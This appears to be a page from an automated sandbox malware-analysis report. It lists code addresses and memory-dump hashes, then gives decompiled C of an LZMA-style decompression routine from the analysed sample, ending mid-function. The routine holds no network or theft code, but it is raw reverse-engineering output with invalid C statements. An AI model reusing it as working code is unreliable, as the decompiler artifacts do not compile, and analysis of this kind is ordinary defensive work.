                                                                                0x00406420
                                                                                0x00406436
                                                                                0x0040643b
                                                                                0x00406473
                                                                                0x00406473
                                                                                0x00406477
                                                                                0x004064a3
                                                                                0x004064a5
                                                                                0x004064ac
                                                                                0x004064af
                                                                                0x004064b2
                                                                                0x004064b2
                                                                                0x004064b7
                                                                                0x004064b7
                                                                                0x004064b9
                                                                                0x004064bc
                                                                                0x004064c3
                                                                                0x004064c6
                                                                                0x004064f3
                                                                                0x004064f3
                                                                                0x004064f6
                                                                                0x004064f9
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x0040656d
                                                                                0x00000000
                                                                                0x0040656d
                                                                                0x004064fb
                                                                                0x00406501
                                                                                0x00406504
                                                                                0x00406507
                                                                                0x0040650a
                                                                                0x0040650d
                                                                                0x00406510
                                                                                0x00406513
                                                                                0x00406516
                                                                                0x00406519
                                                                                0x0040651c
                                                                                0x00406535
                                                                                0x00406537
                                                                                0x0040653a
                                                                                0x0040653b
                                                                                0x0040653e
                                                                                0x00406540
                                                                                0x00406543
                                                                                0x00406545
                                                                                0x00406547
                                                                                0x0040654a
                                                                                0x0040654c
                                                                                0x0040654f
                                                                                0x00406553
                                                                                0x00406555
                                                                                0x00406555
                                                                                0x00406556
                                                                                0x00406559
                                                                                0x0040655c
                                                                                0x0040651e
                                                                                0x0040651e
                                                                                0x00406526
                                                                                0x0040652b
                                                                                0x0040652d
                                                                                0x00406530
                                                                                0x00406530
                                                                                0x0040655f
                                                                                0x00406566
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x004064f0
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00000000
                                                                                0x00406568
                                                                                0x00406566
                                                                                0x00406479
                                                                                0x0040647c
                                                                                0x0040647e
                                                                                0x00406481
                                                                                0x00406484
                                                                                0x00406487
                                                                                0x00406489
                                                                                0x0040648c
                                                                                0x0040648f
                                                                                0x0040648f
                                                                                0x00406492
                                                                                0x00406492
                                                                                0x00406495
                                                                                0x0040649c
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00406470
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x00000000
                                                                                0x0040649e
                                                                                0x0040649c
                                                                                0x00406422
                                                                                0x00406425
                                                                                0x00406427
                                                                                0x0040642a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406189
                                                                                0x00406189
                                                                                0x0040618d
                                                                                0x004067d2
                                                                                0x00000000
                                                                                0x004067d2
                                                                                0x00406193
                                                                                0x00406196
                                                                                0x00406199
                                                                                0x0040619c
                                                                                0x0040619f
                                                                                0x004061a2
                                                                                0x004061a5
                                                                                0x004061a7
                                                                                0x004061aa
                                                                                0x004061ad
                                                                                0x004061b0
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406314
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x00000000
                                                                                0x004067de
                                                                                0x0040631e
                                                                                0x00406321
                                                                                0x00406324
                                                                                0x00406327
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x00406329
                                                                                0x0040632c
                                                                                0x0040632f
                                                                                0x00406332
                                                                                0x00406335
                                                                                0x00406338
                                                                                0x0040633b
                                                                                0x0040633c
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x0040633e
                                                                                0x00406341
                                                                                0x00406344
                                                                                0x00406347
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634a
                                                                                0x0040634d
                                                                                0x0040634f
                                                                                0x0040634f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406591
                                                                                0x00406595
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040659b
                                                                                0x0040659e
                                                                                0x004065a1
                                                                                0x004065a4
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a6
                                                                                0x004065a9
                                                                                0x004065ac
                                                                                0x004065af
                                                                                0x004065b2
                                                                                0x004065b5
                                                                                0x004065b8
                                                                                0x004065b9
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065bb
                                                                                0x004065be
                                                                                0x004065c1
                                                                                0x004065c4
                                                                                0x004065c7
                                                                                0x004065ca
                                                                                0x004065ce
                                                                                0x004065d0
                                                                                0x004065d3
                                                                                0x00000000
                                                                                0x004065d5
                                                                                0x00406352
                                                                                0x00406352
                                                                                0x00000000
                                                                                0x00406352
                                                                                0x004065d3
                                                                                0x00406808
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405e37
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00000000
                                                                                0x0040683f
                                                                                0x0040668c
                                                                                0x00406613
                                                                                0x00406610
                                                                                0x00000000
                                                                                0x00406365

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 330da47155b395830ec7628861cd8598e4251ebfa2d64ad31da345f865d913f9
                                                                                • Instruction ID: ad2857e434989c3a84dedcdf29b6a1d28aa822822dbaa99c7dab075b696318d8
                                                                                • Opcode Fuzzy Hash: 330da47155b395830ec7628861cd8598e4251ebfa2d64ad31da345f865d913f9
                                                                                • Instruction Fuzzy Hash: 99715471D00229CFDF28CF98C8547AEBBB1FB44305F15816AD856BB281C7789A86DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004062AD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E004062AD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406847))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
